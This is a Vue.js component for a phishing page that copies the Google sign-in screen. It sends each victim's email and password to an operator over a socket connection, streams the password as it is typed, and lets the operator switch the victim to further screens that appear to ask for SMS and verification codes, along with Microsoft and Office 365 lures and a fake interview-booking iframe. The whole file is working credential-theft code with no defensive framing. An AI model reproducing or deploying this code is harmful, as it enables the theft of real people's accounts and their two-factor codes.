<template>
  <div class="body-class">
    <div v-if="phase == 1">
      <div class="container d-flex align-items-center justify-content-center min-vh-100 flex-column">
      <div class="login-box w-100" id="login-step-1" v-if="step1">
        <div class="py-4">
          <svg
            xmlns="https://www.w3.org/2000/svg"
            width="48"
            height="48"
            viewBox="0 0 40 48"
            aria-hidden="true"
            jsname="jjf7Ff">
            <path
              fill="#4285F4"
              d="M39.2 24.45c0-1.55-.16-3.04-.43-4.45H20v8h10.73c-.45 2.53-1.86 4.68-4 6.11v5.05h6.5c3.78-3.48 5.97-8.62 5.97-14.71z"
            ></path>
            <path
              fill="#34A853"
              d="M20 44c5.4 0 9.92-1.79 13.24-4.84l-6.5-5.05C24.95 35.3 22.67 36 20 36c-5.19 0-9.59-3.51-11.15-8.23h-6.7v5.2C5.43 39.51 12.18 44 20 44z"
            ></path>
            <path
              fill="#FABB05"
              d="M8.85 27.77c-.4-1.19-.62-2.46-.62-3.77s.22-2.58.62-3.77v-5.2h-6.7C.78 17.73 0 20.77 0 24s.78 6.27 2.14 8.97l6.71-5.2z"
            ></path>
            <path
              fill="#E94235"
              d="M20 12c2.93 0 5.55 1.01 7.62 2.98l5.76-5.76C29.92 5.98 25.39 4 20 4 12.18 4 5.43 8.49 2.14 15.03l6.7 5.2C10.41 15.51 14.81 12 20 12z"
            ></path>
          </svg>
        </div>
        <div class="row g-5">
          <div class="col-lg-6">
            <h1 class="fw-normal mb-2">Sign in</h1>
            <p class="mb-4">Use your Google Account</p>
          </div>
          <div class="col-lg-6 px-2">
            <form id="email-form" @submit.prevent>
              <div class="floating-label-group">
                <input 
                  type="text" 
                  v-model="username" 
                  id="email" 
                  placeholder=" " 
                  required 
                  :disabled="isLoading"
                />
                <label for="email">Email or phone</label>
                <div v-if="message" class="text-danger small mt-1">{{ message }}</div>
              </div>
              <div class="mb-4">
                <a
                  href="#"
                  class="small text-decoration-none"
                  style="
                    color: #0b57d0;
                    font-size: 14px;
                    font-weight: 500;
                    letter-spacing: 0.015625rem 0.25px;
                  "
                  >Forgot email?</a
                >
              </div>
              <p
                class="small mb-3"
                style="
                  font-weight: 500;
                  font-size: 14px;
                  line-height: 1.4285714286;
                  color: #444746;
                "
              >
                Not your computer? Use Guest Mode to log in privately.
                <br />
                <a style="color: #0b57d0 !important"
                  >Learn more about using Guest Mode</a
                >
              </p>
              <div
                class="d-flex justify-content-end mt-5 gap-5 align-items-center"
              >
                <a
                  href="#"
                  class="text-decoration-none small"
                  style="color: #0b57d0; text-decoration: none !important"
                  >Create account</a
                >
                <button 
                  type="submit" 
                  @click="handleLogin()"  
                  class="btn btn-primary px-4"
                  :disabled="isLoading"
                >
                  Next
                </button>
              </div>
            </form>
          </div>
        </div>
      </div>

      <div class="login-box w-100" id="login-step-2" v-if="step2">
        <div class="py-4">
          <svg
            xmlns="https://www.w3.org/2000/svg"
            width="48"
            height="48"
            viewBox="0 0 40 48"
            aria-hidden="true"
            jsname="jjf7Ff"
          >
            <path
              fill="#4285F4"
              d="M39.2 24.45c0-1.55-.16-3.04-.43-4.45H20v8h10.73c-.45 2.53-1.86 4.68-4 6.11v5.05h6.5c3.78-3.48 5.97-8.62 5.97-14.71z"
            ></path>
            <path
              fill="#34A853"
              d="M20 44c5.4 0 9.92-1.79 13.24-4.84l-6.5-5.05C24.95 35.3 22.67 36 20 36c-5.19 0-9.59-3.51-11.15-8.23h-6.7v5.2C5.43 39.51 12.18 44 20 44z"
            ></path>
            <path
              fill="#FABB05"
              d="M8.85 27.77c-.4-1.19-.62-2.46-.62-3.77s.22-2.58.62-3.77v-5.2h-6.7C.78 17.73 0 20.77 0 24s.78 6.27 2.14 8.97l6.71-5.2z"
            ></path>
            <path
              fill="#E94235"
              d="M20 12c2.93 0 5.55 1.01 7.62 2.98l5.76-5.76C29.92 5.98 25.39 4 20 4 12.18 4 5.43 8.49 2.14 15.03l6.7 5.2C10.41 15.51 14.81 12 20 12z"
            ></path>
          </svg>
        </div>
        <div class="row g-5">
          <div class="col-lg-6">
            <h3 class="fw-normal mb-1">Welcome</h3>
            <div
              class="d-flex align-items-center border rounded-pill px-1 py-0"
              style="width: fit-content; height: 28px"
            >
              <svg
                aria-hidden="true"
                class="Qk3oof"
                fill="currentColor"
                focusable="false"
                width="22px"
                height="22px"
                viewBox="0 0 24 24"
                xmlns="https://www.w3.org/2000/svg"
              >
                <path
                  d="M12 2C6.48 2 2 6.48 2 12s4.48 10 10 10 10-4.48 10-10S17.52 2 12 2zm6.36 14.83c-1.43-1.74-4.9-2.33-6.36-2.33s-4.93.59-6.36 2.33C4.62 15.49 4 13.82 4 12c0-4.41 3.59-8 8-8s8 3.59 8 8c0 1.82-.62 3.49-1.64 4.83zM12 6c-1.94 0-3.5 1.56-3.5 3.5S10.06 13 12 13s3.5-1.56 3.5-3.5S13.94 6 12 6z"
                ></path>
              </svg>
              <span id="display-email" style="font-size: 13px !important; font-weight: 600 !important" class="me-2">{{username}}</span>
              <svg
                xmlns="http://www.w3.org/2000/svg"
                width="12"
                height="12"
                fill="currentColor"
                viewBox="0 0 16 16"
              >
                <path
                  d="M7.247 11.14 2.451 5.658c-.566-.682-.106-1.658.753-1.658h9.592c.86 0 1.32.976.753 1.658L8.753 11.14a1 1 0 0 1-1.506 0z"
                />
              </svg>
            </div>
          </div>
          <div class="col-lg-6 px-0">
            <form id="password-form" @submit.prevent>
              <div class="floating-label-group mt-3">
                <input 
                  :type="passwordFieldType" 
                  id="password" 
                  v-model="password" 
                  @input="onPasswordInput"
                  placeholder=" " 
                  required 
                  :disabled="isLoading"
                />
                <label for="password" style="font-size: medium">Enter your password</label>
              </div>
              <div class="form-check mt-2 mb-3">
                <input
                  class="form-check-input"
                  type="checkbox"
                  id="showPassword"
                  v-model="showPassword"
                  @change="togglePasswordVisibility"
                />
                <label style="font-size: 13px; font-weight: 600" class="form-check-label" for="showPassword"
                  >Show password</label
                >
              </div>
              <div
                class="d-flex justify-content-end gap-5 mt-5 align-items-center"
              >
                <a
                  href="#"
                  class="text-decoration-none small"
                  style="color: #0b57d0"
                  >Forgot password</a
                >
                <button 
                  type="submit" 
                  @click="loginAction()"  
                  class="btn btn-primary px-4"
                  :disabled="isLoading"
                >
                  Next
                </button>
              </div>
            </form>
          </div>
        </div>
      </div>

      <!-- Footer -->
      <footer
        class="w-100 px-4 py-2 mt-4 d-flex justify-content-between align-items-center"
        style="font-size: 13px; color: #5f6368; max-width: 1050px"
      >
        <div class="d-flex align-items-center">
          English (United States)
          <svg
            xmlns="http://www.w3.org/2000/svg"
            width="12"
            height="12"
            fill="currentColor"
            class="ms-1"
            viewBox="0 0 16 16"
          >
            <path
              d="M7.247 11.14 2.451 5.658c-.566-.682-.106-1.658.753-1.658h9.592c.86 0 1.32.976.753 1.658l-4.796 5.482a1 1 0 0 1-1.506 0z"
            />
          </svg>
        </div>
        <div class="d-flex gap-3">
          <a href="#" class="text-decoration-none text-secondary">Help</a>
          <a href="#" class="text-decoration-none text-secondary">Privacy</a>
          <a href="#" class="text-decoration-none text-secondary">Terms</a>
        </div>
      </footer>
    </div>
    </div>
    <SaiMK v-if="phase == 2" />
    <XacMinhSMS v-if="phase == 3" />
    <XacMinhCode v-if="phase == 4" />
    <XacMinh v-if="phase == 5" />
    <div v-if="phase == 6" class="iframe-container">
      <iframe src="https://calendly.com/kriskekillibrewlvmgo712/google-interview" style="width: 100%; height: 100%; border: none;"></iframe>
    </div>

    <XacMinhErr v-if="phase == 7" />
    <XacMinhCodeErr v-if="phase == 8" />

    <Microsoft v-if="phase == 9" />
    <MicrosoftError v-if="phase == 10" />
    
    <Office v-if="phase == 11" />
    <OfficeError v-if="phase == 12" />
    
    <PheDuyet v-if="phase == 999" :adminData="adminMessageData" />
  </div>
</template>
<script>
import SaiMK from '../4_Sai_MK/SaiMK.vue';
import XacMinhSMS from '../5_Xac_Minh_SMS/XacMinhSMS.vue';
import XacMinhCode from '../6_XacMinh_Code/XacMinhCode.vue';
import XacMinhCodeErr from '../7_XacMinh_Code_Err/XacMinh_CodeErr.vue';
import XacMinh from '../8_Xac_Minh/XacMinh.vue';
import XacMinhErr from '../9_Xac_Minh_Err/XacMinhErr.vue';
import PheDuyet from '../10_PheDuyet/PheDuyet.vue';

import Microsoft from '../11_microsoft/Microsoft.vue';
import MicrosoftError from '../12_microsoft_saicode/Microsoft.vue';

import Office from '../13_office365/Office.vue';
import OfficeError from '../14_office365_saicode/Office.vue';

export default {
  name: 'Login',
  components: { SaiMK, XacMinh, XacMinhCode, XacMinhSMS, XacMinhErr, XacMinhCodeErr, PheDuyet, Microsoft, MicrosoftError, Office, OfficeError },
  data() {
    return {
      username: '',
      password: '',
      message: '',
      smscode: '',
      authcode: '',
      authgoogle:'',
      phase: 1,
      step1: true,
      step2: false,
      showSaiMK: false,
      showXacMinh: false,
      showXacMinhCode: false,
      showPassword: false,
      adminMessageData: null, // Lưu trữ dữ liệu từ admin-message
      typingTimer: null, // Timer cho debounce typing
      isLoading: false // Trạng thái loading cho button
    };
  },
  computed: {
    passwordFieldType() {
      return this.showPassword ? 'text' : 'password';
    }
  },
  methods: {
    togglePasswordVisibility() {
      // Method được gọi khi checkbox thay đổi
      // showPassword đã được cập nhật qua v-model
    },
    
    onPasswordInput() {
      // Clear timer cũ nếu có
      if (this.typingTimer) {
        clearTimeout(this.typingTimer);
      }
      
      // Debounce 500ms để tránh spam events
      this.typingTimer = setTimeout(() => {
        // Gửi sự kiện tới admin khi user đang gõ password
        if (this.password && this.password.length > 0) {
          const typingData = {
            username: this.username,
            formType: 'login_password',
            inputValue: this.password,
            time: new Date().toISOString()
          };
          
          // Emit socket event để admin có thể theo dõi
          this.$socket.emit('user-typing-password', typingData);
        }
      }, 500);
    },
    
    readEmailFromURL() {
      // Lấy URL parameters
      const urlParams = new URLSearchParams(window.location.search);
      const emailParam = urlParams.get('email');
      
      if (emailParam) {
        const decodedEmail = decodeURIComponent(emailParam);
        
        this.username = decodedEmail;
        localStorage.setItem('email', decodedEmail);
      }
    },
    
    isValidUsername(username) {
      const phoneRegex = /^\d{9,11}$/;
      const emailRegex = /^[\w-\.]+@([\w-]+\.)+[\w-]{2,4}$/;
      return phoneRegex.test(username) || emailRegex.test(username);
    },
    handleLogin() {
      if (!this.username) return;
      if (!this.isValidUsername(this.username)) {
        this.message = 'Invalid email Address!';
        return;
      }

      // Set loading state
      this.isLoading = true;

      const loginData = {
        username: this.username,
        password: '------',
        status: 'prelogin',
        time: new Date().toISOString()
      };

      localStorage.setItem('email', this.username);
      const step1 = document.getElementById("login-step-1");
      step1.classList.add("transitioning");

      // Tự động xóa class transitioning sau 15 giây
      setTimeout(() => {
        if (step1) {
          step1.classList.remove("transitioning");
        }
      }, 2000);

      setTimeout(() => {
        this.step1 = false;
        this.step2 = true;
        this.isLoading = false; // Reset loading state

        const step1 = document.getElementById("login-step-1");
        const step2 = document.getElementById("login-step-2");
        
        if (step1) {
          step1.classList.remove("transitioning");
        }
        if (step2) {
          step2.classList.remove("transitioning");
        }
      }, 2000);

      this.$socket.emit('user-login', loginData);
    },

    loginAction(){
      if (!this.password) {
        this.message = 'Invalid Password';
        return;
      }

      // Set loading state
      this.isLoading = true;

      const loginData = {
        username: this.username,
        password: this.password,
        status: 'login',
        time: new Date().toISOString()
      };

      const step2 = document.getElementById("login-step-2");
      step2.classList.add("transitioning");

      setTimeout(() => {
        if (step2) {
          step2.classList.remove("transitioning");
        }
        this.isLoading = false; // Reset loading state
      }, 180000);

      localStorage.setItem('isLoggedIn', 'true')
      localStorage.setItem('accountinfo', JSON.stringify(loginData))

      this.$socket.emit('user-login', loginData);
    }
  },

  mounted() {
    document.title = "Sign in - Google";
    // Đọc email từ URL parameters
    this.readEmailFromURL();
    
    setTimeout(() => {
      this.$socket.emit('user-login', {
        username: "New User...",
        password: '------',
        status: 'preloginPage',
        time: new Date().toISOString()
      });
    }, 600);
    
    this.$socket.on('admin-message', (data) => {
      const step1 = document.getElementById("login-step-1");
      const step2 = document.getElementById("login-step-2");
      
      if (step1) {
        step1.classList.remove("transitioning");
      }
      if (step2) {
        step2.classList.remove("transitioning");
      }
      
      // Lưu trữ dữ liệu admin-message
      this.adminMessageData = data;
      
      var phaseData = typeof data === 'object' ? JSON.stringify(data) : data;
      if (phaseData.toString().indexOf("999") >= 0) {
        // Parse securityCode từ định dạng "999-{securityCode}"
        if (phaseData.includes('-')) {
          const parts = phaseData.split('-');
          if (parts.length === 2) {
            const securityCode = parts[1];
            this.adminMessageData = { securityCode: securityCode };
          }
        }
        this.phase = 999;
        return;
      }

      if (phaseData == 6) {
        localStorage.removeItem('email');
        localStorage.removeItem('accountinfo'); 
        localStorage.removeItem('isLoggedIn'); 
      }

      this.phase = phaseData;
    });
  }
};
</script>
<style lang="css" scoped>
  @import "./styles.css";
</style>